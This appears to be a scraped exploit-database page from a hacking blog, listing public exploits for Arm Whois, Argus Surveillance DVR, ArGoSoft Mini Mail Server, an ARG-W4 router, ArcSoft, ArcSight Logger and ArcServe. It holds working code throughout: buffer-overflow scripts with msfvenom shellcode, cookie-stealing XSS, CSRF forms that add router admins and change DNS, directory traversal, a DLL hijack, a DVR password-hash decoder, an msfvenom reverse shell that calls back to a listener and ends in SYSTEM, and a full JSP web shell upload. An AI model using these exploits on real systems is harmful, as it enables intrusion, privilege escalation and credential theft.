# Exploit Title: Arm Whois 3.11 - Denial of Service (PoC)
# Date: 2018-10-31
# Exploit Author: Yair Rodríguez Aparicio
# Vendor Homepage: http://www.armcode.com/
# Software Link: http://www.armcode.com/downloads/arm-whois.exe
# Version: 3.11
# Tested on: Windows XP Profesional Español SP3 x86
# Steps to Produce the Crash:
# 1.- Run python code : python whois.py
# 2.- Open text.txt and copy content to clipboard
# 3.- Open whois.exe
# 4.- Paste clipboard on "IP address or domain"
# 5.- click on "Retrieves IP-adress info"
# 6.- Crashed!
buffer = "\x41" * 700
f = open("text.txt", "w")
f.write(buffer)
f.close()
.png.c9b8f3e9eda461da3c0e9ca5ff8c6888.png)
A group blog by Leader in
Hacker Website - Providing Professional Ethical Hacking Services
-
Entries
16114 -
Comments
7952 -
Views
863112747
Contributors to this blog
-
16114
About this blog
Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.
Entries in this blog
# Exploit Title: Arm Whois 3.11 - Buffer Overflow (SEH)
# Date: 2018-11-05
# Exploit Author: Yair Rodríguez Aparicio (0-day DoS exploit), Semen Alexandrovich Lyhin (1-day fully working exploit)
# Vendor Homepage: http://www.armcode.com/
# Software Link: http://www.armcode.com/downloads/arm-whois.exe
# Version: 3.11
# Tested on: Windows XP Proffesional Español SP3 x86 (PoC), Windows XP Proffesional English SP3 x86 (fully working)
# HOWTO:
# 1.- Run python code : python whois.py
# 2.- Copy content to clipboard, from console or from file - text.txt
# 3.- Open whois.exe
# 4.- Paste clipboard on "IP address or domain"
# 5.- click on "Retrieves IP-adress info"
# 6.- CMD is popped.
#max buffer lenght: 658. Badchars: a lot of. alpha_mixed + "\x89" works fine.
#msfvenom -p windows/exec CMD=cmd.exe -f py -e x86/alpha_mixed -b "\x89"
#445
buf = ""
buf += "\x54\x5d\xdb\xd5\xd9\x75\xf4\x59\x49\x49\x49\x49\x49"
buf += "\x49\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37"
buf += "\x51\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41"
buf += "\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42\x58"
buf += "\x50\x38\x41\x42\x75\x4a\x49\x79\x6c\x6b\x58\x4d\x52"
buf += "\x33\x30\x75\x50\x35\x50\x31\x70\x4c\x49\x68\x65\x56"
buf += "\x51\x39\x50\x70\x64\x4c\x4b\x32\x70\x36\x50\x4e\x6b"
buf += "\x73\x62\x54\x4c\x4e\x6b\x72\x72\x62\x34\x4c\x4b\x54"
buf += "\x32\x54\x68\x34\x4f\x6d\x67\x32\x6a\x77\x56\x46\x51"
buf += "\x49\x6f\x6c\x6c\x47\x4c\x61\x71\x63\x4c\x63\x32\x54"
buf += "\x6c\x61\x30\x59\x51\x7a\x6f\x66\x6d\x35\x51\x4a\x67"
buf += "\x59\x72\x5a\x52\x33\x62\x30\x57\x4c\x4b\x50\x52\x64"
buf += "\x50\x4c\x4b\x52\x6a\x77\x4c\x4c\x4b\x42\x6c\x46\x71"
buf += "\x44\x38\x69\x73\x71\x58\x63\x31\x5a\x71\x73\x61\x4c"
buf += "\x4b\x32\x79\x35\x70\x47\x71\x6b\x63\x4e\x6b\x32\x69"
buf += "\x36\x78\x5a\x43\x45\x6a\x33\x79\x4e\x6b\x64\x74\x6c"
buf += "\x4b\x77\x71\x7a\x76\x35\x61\x4b\x4f\x6e\x4c\x7a\x61"
buf += "\x68\x4f\x64\x4d\x33\x31\x48\x47\x66\x58\x6d\x30\x53"
buf += "\x45\x49\x66\x54\x43\x43\x4d\x58\x78\x65\x6b\x61\x6d"
buf += "\x76\x44\x53\x45\x4d\x34\x50\x58\x4c\x4b\x42\x78\x74"
buf += "\x64\x56\x61\x39\x43\x71\x76\x6c\x4b\x34\x4c\x52\x6b"
buf += "\x4c\x4b\x32\x78\x55\x4c\x75\x51\x68\x53\x6e\x6b\x56"
buf += "\x64\x6e\x6b\x65\x51\x78\x50\x6c\x49\x73\x74\x37\x54"
buf += "\x47\x54\x61\x4b\x53\x6b\x53\x51\x71\x49\x73\x6a\x62"
buf += "\x71\x6b\x4f\x4d\x30\x33\x6f\x43\x6f\x71\x4a\x6c\x4b"
buf += "\x64\x52\x4a\x4b\x4e\x6d\x53\x6d\x31\x7a\x57\x71\x6c"
buf += "\x4d\x4c\x45\x68\x32\x47\x70\x47\x70\x57\x70\x66\x30"
buf += "\x75\x38\x56\x51\x6e\x6b\x70\x6f\x6d\x57\x39\x6f\x49"
buf += "\x45\x6d\x6b\x4a\x50\x4e\x55\x69\x32\x50\x56\x73\x58"
buf += "\x59\x36\x4c\x55\x6f\x4d\x6f\x6d\x6b\x4f\x48\x55\x67"
buf += "\x4c\x45\x56\x63\x4c\x77\x7a\x4f\x70\x59\x6b\x4d\x30"
buf += "\x30\x75\x57\x75\x4f\x4b\x37\x37\x42\x33\x70\x72\x62"
buf += "\x4f\x63\x5a\x75\x50\x50\x53\x39\x6f\x4b\x65\x35\x33"
buf += "\x50\x6d\x53\x54\x46\x4e\x30\x65\x62\x58\x53\x55\x75"
buf += "\x50\x41\x41"
shellcode = buf + "\x41"*(658-len(buf))
EDX_BAD_OVERWRITE = "\x42"*4
EIP = "\xC2\x34\x40"
second_space = "\xe9\x65\xFD\xFF\xFF"+ "\x43"*3
first_space = "\x43"*2 + "\xEB\xF2"
buffer = "\x41\x41" + shellcode + EDX_BAD_OVERWRITE + second_space + first_space + EIP
print buffer
f = open("text.txt", "w")
f.write(buffer)
f.close()
# Exploit Title: Arm Whois 3.11 - Buffer Overflow (ASLR)
# Google Dork: [if applicable]
# Date: 23/11/2018
# Exploit Author: zephyr
# Vendor Homepage: http://www.armcode.com
# Software Link: http://www.armcode.com/downloads/arm-whois.exe
# Version: 3.11
# Tested on: Windows Vista Ultimate SP1 x86 unpatched
# CVE :
# nSEH @ 672 on Windows Vista Ultimate SP1 unpatched
# msfvenom -p windows/exec cmd=calc.exe -e x86/shikata_ga_nai -a x86 --platform windows
nops = "\x90"*20
buf = "w00tw00t" + nops + ("\xba\x0e\xc3\xc8\xe6\xdd\xc4\xd9\x74\x24\xf4\x5e\x29"
"\xc9\xb1\x31\x83\xc6\x04\x31\x56\x0f\x03\x56\x01\x21"
"\x3d\x1a\xf5\x27\xbe\xe3\x05\x48\x36\x06\x34\x48\x2c"
"\x42\x66\x78\x26\x06\x8a\xf3\x6a\xb3\x19\x71\xa3\xb4"
"\xaa\x3c\x95\xfb\x2b\x6c\xe5\x9a\xaf\x6f\x3a\x7d\x8e"
"\xbf\x4f\x7c\xd7\xa2\xa2\x2c\x80\xa9\x11\xc1\xa5\xe4"
"\xa9\x6a\xf5\xe9\xa9\x8f\x4d\x0b\x9b\x01\xc6\x52\x3b"
"\xa3\x0b\xef\x72\xbb\x48\xca\xcd\x30\xba\xa0\xcf\x90"
"\xf3\x49\x63\xdd\x3c\xb8\x7d\x19\xfa\x23\x08\x53\xf9"
"\xde\x0b\xa0\x80\x04\x99\x33\x22\xce\x39\x98\xd3\x03"
"\xdf\x6b\xdf\xe8\xab\x34\xc3\xef\x78\x4f\xff\x64\x7f"
"\x80\x76\x3e\xa4\x04\xd3\xe4\xc5\x1d\xb9\x4b\xf9\x7e"
"\x62\x33\x5f\xf4\x8e\x20\xd2\x57\xc4\xb7\x60\xe2\xaa"
"\xb8\x7a\xed\x9a\xd0\x4b\x66\x75\xa6\x53\xad\x32\x02"
"\x6e\xac\x19\x3b\xd7\xa4\x1c\x26\xe8\x12\x62\x5f\x6b"
"\x97\x1a\xa4\x73\xd2\x1f\xe0\x33\x0e\x6d\x79\xd6\x30"
"\xc2\x7a\xf3\x52\x85\xe8\x9f\xba\x20\x89\x3a\xc3")
egghunter = nops + ("\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74\xef\xb8\x77\x30\x30\x74\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7") + "\x90"*15
junk = "A"*(672-len(buf+egghunter))
nseh = "\xeb\xc7\x90\x90"
seh = "\x57\x22\x41"
payload = junk + buf + egghunter + nseh + seh
f = open("tmp.txt", 'wb')
f.write(payload)
f.close()
print len(payload)
source: https://www.securityfocus.com/bid/47826/info
Argyle Social is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
1.
<form action="www.example.com/settings-ajax/stream_filter_rules/create" method="post" name="main">
<input type="hidden" name="stream_filter_rule" value='{"name":"rulename","id":"","flags":[ "flagged"],"networks":null,"user_id":"0","terms":"XSS\& quot;><script>alert(document.cookie)</script>"}'>
</form>
<script>
document.main.submit();
</script>
2.
<form action="www.example.com/publish-ajax/efforts/create" method="post" name="main">
<input type="hidden" name="effort" value='{"effort_id":"","title":"ptitle2\">< font color="#0000FF"><script>alert(document.cookie)</script>","url":"http://www.google.com","short&q uot;:null,"campaigns":[],"primary_campaign":null,"flights":[{"glass_id" ;:"post0","flight_id":null,"mdk":false,"source":"web interface","content_type":"twitter-status","content":{"content":& quot;hello"},"stime":"4/30/2011 23:10:00","networks":[{"id":"1","name":"My Name","type":"twitter","url":"","avatar":"http://a 2.twimg.com/profile_images/1124040897/at-twitter_reasonably_small.png"}],"waparams":{"pnam e":null}}]}'>
</form>
<script>
document.main.submit();
</script>
/*
# Exploit Title: Argus Surveillance DVR 4.0.0.0 - Privilege Escalation
# Author: John Page (aka hyp3rlinx)
# Date: 2018-08-29
# Vendor: Argus Surveillance DVR - 4.0.0.0
# Software Link: http://www.argussurveillance.com/download/DVR_stp.exe
# CVE: N/A
# Tested on: Windows 7 x86
# Description:
# Argus Surveillance DVR 4.0.0.0 devices allow Trojan File SYSTEM Privilege Escalation.
# Placing a Trojan File DLL named "gsm_codec.dll" in Argus application directory will
# lead to arbitrary code execution with SYSTEM integrity
# Affected Component: DVRWatchdog.exe
# Exploit/POC
# Create DLL 32bit DLL named "gsm_codec.dll" and place in App Dir,
# launch Argus DVR tada! your now SYSTEM.
*/
#include <windows.h>
/* hyp3rlinx */
/*
gcc -c -m32 gsm_codec.c
gcc -shared -m32 -o gsm_codec.dll gsm_codec.o
*/
void systemo(){
MessageBox( 0, "3c184981367094fce3ab70efc3b44583" , "philbin :)" , MB_YESNO + MB_ICONQUESTION );
}
BOOL WINAPI DllMain(HINSTANCE hinstDLL,DWORD fdwReason,LPVOID lpvReserved){
switch(fdwReason){
case DLL_PROCESS_ATTACH:{
systemo();
break;
}
case DLL_PROCESS_DETACH:{
systemo();
break;
}
case DLL_THREAD_ATTACH:{
systemo();
break;
}
case DLL_THREAD_DETACH:{
systemo();
break;
}
}
return TRUE;
}
# https://vimeo.com/287115698
# Greetz: ***Greetz: indoushka | Eduardo | GGA***
# Exploit: Argus Surveillance DVR 4.0.0.0 - Directory Traversal
# Author: John Page (aka hyp3rlinx)
# Date: 2018-08-28
# Vendor: www.argussurveillance.com
# Software Link: http://www.argussurveillance.com/download/DVR_stp.exe
# CVE: N/A
# Description:
# Argus Surveillance DVR 4.0.0.0 devices allow Unauthenticated Directory Traversal,
# leading to File Disclosure via a ..%2F in the WEBACCOUNT.CGI RESULTPAGE parameter.
# PoC
curl "http://VICTIM-IP:8080/WEBACCOUNT.CGI?OkBtn=++Ok++&RESULTPAGE=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2FWindows%2Fsystem.ini&USEREDIRECT=1&WEBACCOUNTID=&WEBACCOUNTPASSWORD="
# Result:
; for 16-bit app support
woafont=dosapp.fon
EGA80WOA.FON=EGA80WOA.FON
EGA40WOA.FON=EGA40WOA.FON
CGA80WOA.FON=CGA80WOA.FON
CGA40WOA.FON=CGA40WOA.FON
wave=mmdrv.dll
timer=timer.drv
# https://vimeo.com/287115273
# Greetz: ***Greetz: indoushka | Eduardo | GGA***
# Exploit Title: Argus Surveillance DVR 4.0 - Weak Password Encryption
# Exploit Author: Salman Asad (@deathflash1411) a.k.a LeoBreaker
# Date: 12.07.2021
# Version: Argus Surveillance DVR 4.0
# Tested on: Windows 7 x86 (Build 7601) & Windows 10
# Reference: https://deathflash1411.github.io/blog/dvr4-hash-crack
# Note: Argus Surveillance DVR 4.0 configuration is present in
# C:\ProgramData\PY_Software\Argus Surveillance DVR\DVRParams.ini
# I'm too lazy to add special characters :P
characters = {
'ECB4':'1','B4A1':'2','F539':'3','53D1':'4','894E':'5',
'E155':'6','F446':'7','C48C':'8','8797':'9','BD8F':'0',
'C9F9':'A','60CA':'B','E1B0':'C','FE36':'D','E759':'E',
'E9FA':'F','39CE':'G','B434':'H','5E53':'I','4198':'J',
'8B90':'K','7666':'L','D08F':'M','97C0':'N','D869':'O',
'7357':'P','E24A':'Q','6888':'R','4AC3':'S','BE3D':'T',
'8AC5':'U','6FE0':'V','6069':'W','9AD0':'X','D8E1':'Y','C9C4':'Z',
'F641':'a','6C6A':'b','D9BD':'c','418D':'d','B740':'e',
'E1D0':'f','3CD9':'g','956B':'h','C875':'i','696C':'j',
'906B':'k','3F7E':'l','4D7B':'m','EB60':'n','8998':'o',
'7196':'p','B657':'q','CA79':'r','9083':'s','E03B':'t',
'AAFE':'u','F787':'v','C165':'w','A935':'x','B734':'y','E4BC':'z','!':'B398'}
# ASCII art is important xD
banner = '''
#########################################
# _____ Surveillance DVR 4.0 #
# / _ \_______ ____ __ __ ______ #
# / /_\ \_ __ \/ ___\| | \/ ___/ #
# / | \ | \/ /_/ > | /\___ \ #
# \____|__ /__| \___ /|____//____ > #
# \/ /_____/ \/ #
# Weak Password Encryption #
############ @deathflash1411 ############
'''
print(banner)
# Change this :)
pass_hash = "418DB740F641E03B956BE1D03F7EF6419083956BECB453D1ECB4ECB4"
if (len(pass_hash)%4) != 0:
print("[!] Error, check your password hash")
exit()
split = []
n = 4
for index in range(0, len(pass_hash), n):
split.append(pass_hash[index : index + n])
for key in split:
if key in characters.keys():
print("[+] " + key + ":" + characters[key])
else:
print("[-] " + key + ":Unknown")
# Exploit Title: Argus Surveillance DVR 4.0 - Unquoted Service Path
# Exploit Author: Salman Asad (@deathflash1411) a.k.a LeoBreaker
# Date: 03.09.2021
# Version: Argus Surveillance DVR 4.0
# Tested on: Windows 10
# Note: "Start as service on Windows Startup" must be enabled in Program Options
# Proof of Concept:
C:\Users\death>sc qc ARGUSSURVEILLANCEDVR_WATCHDOG
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: ARGUSSURVEILLANCEDVR_WATCHDOG
TYPE : 110 WIN32_OWN_PROCESS (interactive)
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Program Files\Argus Surveillance DVR\DVRWatchdog.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : Argus Surveillance DVR Watchdog
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem
C:\Users\death>cmd /c wmic service get name,displayname,pathname,startmode |findstr /i "auto" |findstr /i /v "c:\windows\\" |findstr /i /v """
Argus Surveillance DVR Watchdog ARGUSSURVEILLANCEDVR_WATCHDOG C:\Program Files\Argus Surveillance DVR\DVRWatchdog.exe Auto
#!/usr/bin/env python
# coding: utf-8
############ Description: ##########
# The vulnerability was discovered during a vulnerability research lecture.
#
# Denial-of-service vulnerability in ArGoSoft Mini Mail Server 1.0.0.2
# and earlier allows remote attackers to waste CPU resources (memory
# consumption) via unspecified vectors.
####################################
# Exploit Title: ArGoSoft Mini Mail Server - DoS (Memory Consumption)
# Date: 2017-10-21
# Exploit Author: Berk Cem Göksel
# Contact: twitter.com/berkcgoksel || bgoksel.com
# Vendor Homepage: http://www.argosoft.com
# Software Link: http://www.argosoft.com/rootpages/MiniMail/Default.aspx
# Version: 1.0.0.2
# Tested on: Windows 10
# Category: Windows Remote Denial-of-Service
# CVE : CVE-2017-15223
import socket
from threading import Thread
def data():
ip = '127.0.0.1'
port = 25
counter = 50
string = '&'
while True:
try:
if counter >= 10000:
counter = 0
else:
counter = counter + 50
A = (string * counter) + 'user2@othermail.com'
print "String lenght: " + str(len(A))
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.settimeout(5.0)
sock.connect((ip, port))
sock.send('HELO localhost\r\n' + 'MAIL FROM: user1@somemail.com\r\n' + 'RCPT TO: ' + A + '\r\nDATA\r\nMessage-ID:1224\r\SDFGQUIL\r\n"."\r\n' + 'QUIT\r\n')
sock.recv(1024)
sock.close()
except Exception as e:
continue
def main():
iterations = int(input("Threads: "))
for i in range(iterations):
t = Thread(target=data)
t.start()
if __name__ == '__main__':
main()
# Exploit Title: ARG-W4 ADSL Router - Multiple Vulnerabilities
# Date: 2016-12-11
# Exploit Author: Persian Hack Team
# Discovered by : Mojtaba MobhaM
# Tested on: Windows AND Linux
# Exploit Demo : http://persian-team.ir/showthread.php?tid=196
1 - Denial of Service
#!/usr/bin/python
import urllib2
import urllib
site=raw_input("Enter Url : ")
site=site+"/form2Upnp.cgi"
username='admin'
password='admin'
p = urllib2.HTTPPasswordMgrWithDefaultRealm()
p.add_password(None, site, username, password)
handler = urllib2.HTTPBasicAuthHandler(p)
opener = urllib2.build_opener(handler)
urllib2.install_opener(opener)
post = {'daemon':' ','ext_if':'pppoe+1','submit.htm?upnp.htm':'Send'}
data = urllib.urlencode(post)
try:
html = urllib2.urlopen(site,data)
print ("Done ! c_C")
except:
print ("Done ! c_C")
2-1 Cross-Site Request Forgery (Add Admin)
<html>
<body>
<form action="http://192.168.1.1/form2userconfig.cgi" method="POST">
USER:<input type="text" name="username" value="mobham" />
<input type="hidden" name="privilege" value="2" />
PWD:<input type="text" name="newpass" value="mobham" />
RPWD:<input type="texr" name="confpass" value="mobham" />
<input type="hidden" name="adduser" value="Add" />
<input type="hidden" name="hiddenpass" value="" />
<input type="hidden" name="submit.htm?userconfig.htm" value="Send" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
2-2 Cross-Site Request Forgery (Change DNS)
<html>
<body>
<form action="http://192.168.1.1/form2Dns.cgi" method="POST">
<input type="hidden" name="dnsMode" value="1" />
DNS<input type="text" name="dns1" value="2.2.2.2" />
DNS 2<input type="text" name="dns2" value="1.1.1.1" />
DNS 3<input type="text" name="dns3" value="" />
<input type="hidden" name="submit.htm?dns.htm" value="Send" />
<input type="hidden" name="save" value="Apply Changes" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
##########################################################################
# #
# Exploit Title: Arcsoft PhotoStudio 6.0.0.172 - Unquoted Service Path #
# Date: 2023/04/22 #
# Exploit Author: msd0pe #
# Vendor Homepage: https://www.arcsoft.com/ #
# My Github: https://github.com/msd0pe-1 #
# #
##########################################################################
Arcsoft PhotoStudio:
Versions =< 6.0.0.172 contains an unquoted service path which allows attackers to escalate privileges to the system level.
[1] Find the unquoted service path:
> wmic service get name,pathname,displayname,startmode | findstr /i auto | findstr /i /v "C:\Windows\\" | findstr /i /v """
ArcSoft Exchange Service ADExchange C:\Program Files (x86)\Common Files\ArcSoft\esinter\Bin\eservutil.exe Auto
[2] Get informations about the service:
> sc qc "ADExchange"
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: ADExchange
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 0 IGNORE
BINARY_PATH_NAME : C:\Program Files (x86)\Common Files\ArcSoft\esinter\Bin\eservutil.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : ArcSoft Exchange Service
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem
[3] Generate a reverse shell:
> msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.1.101 LPORT=4444 -f exe -o Common.exe
[4] Upload the reverse shell to C:\Program Files (x86)\Common.exe
> put Commom.exe
> ls
drw-rw-rw- 0 Sun Apr 23 04:10:25 2023 .
drw-rw-rw- 0 Sun Apr 23 04:10:25 2023 ..
drw-rw-rw- 0 Sun Apr 23 03:55:37 2023 ArcSoft
drw-rw-rw- 0 Sun Apr 23 03:55:36 2023 Common Files
-rw-rw-rw- 7168 Sun Apr 23 04:10:25 2023 Common.exe
-rw-rw-rw- 174 Sun Jul 24 08:12:38 2022 desktop.ini
drw-rw-rw- 0 Sun Apr 23 03:55:36 2023 InstallShield Installation Information
drw-rw-rw- 0 Thu Jul 28 13:00:04 2022 Internet Explorer
drw-rw-rw- 0 Sun Jul 24 07:27:06 2022 Microsoft
drw-rw-rw- 0 Sun Jul 24 08:18:13 2022 Microsoft.NET
drw-rw-rw- 0 Sat Apr 22 05:48:20 2023 Windows Defender
drw-rw-rw- 0 Sat Apr 22 05:46:44 2023 Windows Mail
drw-rw-rw- 0 Thu Jul 28 13:00:04 2022 Windows Media Player
drw-rw-rw- 0 Sun Jul 24 08:18:13 2022 Windows Multimedia Platform
drw-rw-rw- 0 Sun Jul 24 08:18:13 2022 Windows NT
drw-rw-rw- 0 Fri Oct 28 05:25:41 2022 Windows Photo Viewer
drw-rw-rw- 0 Sun Jul 24 08:18:13 2022 Windows Portable Devices
drw-rw-rw- 0 Sun Jul 24 08:18:13 2022 Windows Sidebar
drw-rw-rw- 0 Sun Jul 24 08:18:13 2022 WindowsPowerShell
[5] Start listener
> nc -lvp 4444
[6] Reboot the service/server
> sc stop "ADExchange"
> sc start "ADExchange"
OR
> shutdown /r
[7] Enjoy !
192.168.1.102: inverse host lookup failed: Unknown host
connect to [192.168.1.101] from (UNKNOWN) [192.168.1.102] 51309
Microsoft Windows [Version 10.0.19045.2130]
(c) Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
nt authority\system
# Exploit Title: ArcSight Logger - Arbitrary File Upload (Code Execution)
# Date: 13.03.2015
# Exploit Author: Julian Horoszkiewicz
# Vendor Homepage: www.hp.com
# Software Link: http://www8.hp.com/us/en/software-solutions/arcsight-logger-log-management/try-now.html
# Version: ArcSight Logger 5.3.1.6838.0 and prior versions
# Tested on: Red Hat Linux
# CVE: CVE-2014-7884
[ Description ]
Configuration import file upload capability does not fully sanitize file names, which allows attackers to put executable files into the document root. Upload of server side (JSP) script with shell accessing function in order to gain remote OS command execution has been conducted in the POC. To access vulnerable feature, user has to be authenticated in the console. Feature is available to all users, also non-administrative ones. Shell commands are executed with default NPA privileges (arcsight) giving full control over the service (for instance /etc/init.d/arcsight_logger stop has been successfully performed). The culprit feature is accessible to all authenticated users, including ones with sole read-only admin role.
[ Proof of Concept ]
Attention, to reproduce the attack for the first time, two requests are required.
First request magically creates subdirectory in the /opt/arcsight/current/backups upload dir.
Second one puts the actual JSP web shell into the document root, by using path traversal refering to the upload dir subdirectory.
Other combinations of direct name manipulation in order to upload anything to the document root did not succeed during the test (references to the upload dir without a subdirectory were refused by the application).
The only required difference between the requests to achieve successful upload into desired location is the filename property in the Content-Disposition HTTP header.
The general rule is as follows:
First request (create /opt/arcsight/current/backups/some_new_dir directory, the uploaded file is irrelevant):
Content-Disposition: form-data; name="field-importFile"; filename="some_new_dir/whatever"
Second request (upload the file into location of choice by traversally refering to that subdirectory):
Content-Disposition: form-data; name="field-importFile"; filename="some_new_dir/../../local/tomcat/webapps/logger/hellcode.jsp"
Please also note that valid tokens (asf_token, session_string, JSESSIONID) are required.
The most efficient way to reproduce this is:
1) name the local JSP web shell file toanything.xml.gz extension
2) choose to import it in the Configuration->Content Management->Import section through the web browser
3) intercept the browser traffic with a local proxy (Burp Suite for instance)
4) change the filename property in the Content-Disposition header so it contains the name of new subdirectory and forward the request
5) send another copy of the same request, this time with filename referring to the subdirectory created with previous request, using path traversal to point into the Logger document root, successfully uploading the web shell.
6) Navigate the browser to http://victim.com:9000/logger/hellcode.jsp
Full requests:
POST /logger/import_content_config_upload.ftl? HTTP/1.1
Host: victim.com:9000
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:30.0) Gecko/20100101 Firefox/30.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://victim.com:9000/logger/import_content_config_upload.ftl?
Cookie: com.arcsight.product.platform.logger.client.session.SessionContext.productName=Logger; com.arcsight.product.platform.logger.client.session.SessionContext.arcsightProductName=ArcSight%20Logger; JSESSIONID=F89541D136E58EFD4B2377313B56B594; user_id_seq=7; session_string=TjF-x1fSWrKb3_tC0mYf7bQ3tVMaoD6kjmBItnWftsk.
Connection: keep-alive
Content-Type: multipart/form-data; boundary=---------------------------17152166115305
Content-Length: 1565
-----------------------------17152166115305
Content-Disposition: form-data; name="uploadid"
-----------------------------17152166115305
Content-Disposition: form-data; name="update"
true
-----------------------------17152166115305
Content-Disposition: form-data; name="asf_token"
7caea3f1-7bfb-4419-a4bb-4a19e3800bff
-----------------------------17152166115305
Content-Disposition: form-data; name="field-importFile"; filename="some_new_dir/hellcode.jsp"
Content-Type: application/x-gzip
<%@ page import="java.util.*,java.io.*"%>
<HTML>
<TITLE>Laudanum JSP Shell</TITLE>
<BODY>
Commands with JSP
<FORM METHOD="GET" NAME="myform" ACTION="">
<INPUT TYPE="text" NAME="cmd">
<INPUT TYPE="submit" VALUE="Send"><br/>
If you use this against a Windows box you may need to prefix your command with cmd.exe /c
</FORM>
<pre>
<%
if (request.getParameter("cmd") != null) {
out.println("Command: " + request.getParameter("cmd") + "<BR>");
Process p = Runtime.getRuntime().exec(request.getParameter("cmd"));
OutputStream os = p.getOutputStream();
InputStream in = p.getInputStream();
DataInputStream dis = new DataInputStream(in);
String disr = dis.readLine();
while ( disr != null ) {
out.println(disr);
disr = dis.readLine();
}
}
%>
</pre>
<hr/>
<address>
Copyright © 2012, <a href="mailto:laudanum@secureideas.net">Kevin Johnson</a> and the Laudanum team.<br/>
Written by Tim Medin.<br/>
Get the latest version at <a href="http://laudanum.secureideas.net">laudanum.secureideas.net</a>.
</address>
</BODY></HTML>
-----------------------------17152166115305--
POST /logger/import_content_config_upload.ftl? HTTP/1.1
Host: victim.com:9000
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:30.0) Gecko/20100101 Firefox/30.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://victim.com:9000/logger/import_content_config_upload.ftl?
Cookie: com.arcsight.product.platform.logger.client.session.SessionContext.productName=Logger; com.arcsight.product.platform.logger.client.session.SessionContext.arcsightProductName=ArcSight%20Logger; JSESSIONID=F89541D136E58EFD4B2377313B56B594; user_id_seq=7; session_string=TjF-x1fSWrKb3_tC0mYf7bQ3tVMaoD6kjmBItnWftsk.
Connection: keep-alive
Content-Type: multipart/form-data; boundary=---------------------------17152166115305
Content-Length: 1565
-----------------------------17152166115305
Content-Disposition: form-data; name="uploadid"
-----------------------------17152166115305
Content-Disposition: form-data; name="update"
true
-----------------------------17152166115305
Content-Disposition: form-data; name="asf_token"
7caea3f1-7bfb-4419-a4bb-4a19e3800bff
-----------------------------17152166115305
Content-Disposition: form-data; name="field-importFile"; filename="some_new_dir/../../local/tomcat/webapps/logger/hellcode.jsp"
Content-Type: application/x-gzip
<%@ page import="java.util.*,java.io.*"%>
<HTML>
<TITLE>Laudanum JSP Shell</TITLE>
<BODY>
Commands with JSP
<FORM METHOD="GET" NAME="myform" ACTION="">
<INPUT TYPE="text" NAME="cmd">
<INPUT TYPE="submit" VALUE="Send"><br/>
If you use this against a Windows box you may need to prefix your command with cmd.exe /c
</FORM>
<pre>
<%
if (request.getParameter("cmd") != null) {
out.println("Command: " + request.getParameter("cmd") + "<BR>");
Process p = Runtime.getRuntime().exec(request.getParameter("cmd"));
OutputStream os = p.getOutputStream();
InputStream in = p.getInputStream();
DataInputStream dis = new DataInputStream(in);
String disr = dis.readLine();
while ( disr != null ) {
out.println(disr);
disr = dis.readLine();
}
}
%>
</pre>
<hr/>
<address>
Copyright © 2012, <a href="mailto:laudanum@secureideas.net">Kevin Johnson</a> and the Laudanum team.<br/>
Written by Tim Medin.<br/>
Get the latest version at <a href="http://laudanum.secureideas.net">laudanum.secureideas.net</a>.
</address>
</BODY></HTML>
-----------------------------17152166115305--
[ Time line ]
28.08.2014 - vulnerability report sent to HP
21.01.2015 - new version containing the fix released by HP
12.03.2015 - security bulletin published (CVE-2014-7884)
[ Credits ]
Julian Horoszkiewicz - IT Security Specialist @ ING Services Polska
Title: ArcServe UDP - Unquoted Service Path Privilege Escalation
CWE Class: CWE-427: Uncontrolled Search Path Element
Date: 04/09/2016
Vendor: ArcServe
Product: ArcServe UDP Standard Edition for Windows, TRIAL
Type: Backup Software
Version: 6.0.3792 Update 2 Build 516
Download URL: http://arcserve.com/free-backup-software-trial/
Tested on: Windows 7x86 EN
Release Mode: coordinated release
- 1. Product Description: -
A comprehensive solution that empowers even a one-person IT department to protect virtual and physical environments with a high degree of simplicity:
Design and manage your entire data protection strategy with a unified management console
Scale your data backup coverage as your organization grows with the push of a button
- 2. Vulnerability Details: -
ArcServe UDP for Windows installs various services.
One of them is the "Arcserve UDP Update Service (CAARCUpdateSvc)" running as SYSTEM.
This particular service has an insecurely quoted path.
Other services where correctly quoted.
An attacker with write permissions on the root-drive or directory in the search path
could place a malicious binary and elevate privileges.
- 3. PoC Details: -
There are various ways to audit for this type of vulnerability.
This proof-of-concept demonstrates both an automated and manual way.
Step 1: Identify the issue
Automatic: use the windows-privesc-check toolkit to audit the local system.
Manual: run 'sc qc CAARCUpdateSvc' and confirm it has an unquoted service path.
Output: C:\Program Files\Arcserve\Unified Data Protection\Update Manager\ARCUpdate.exe
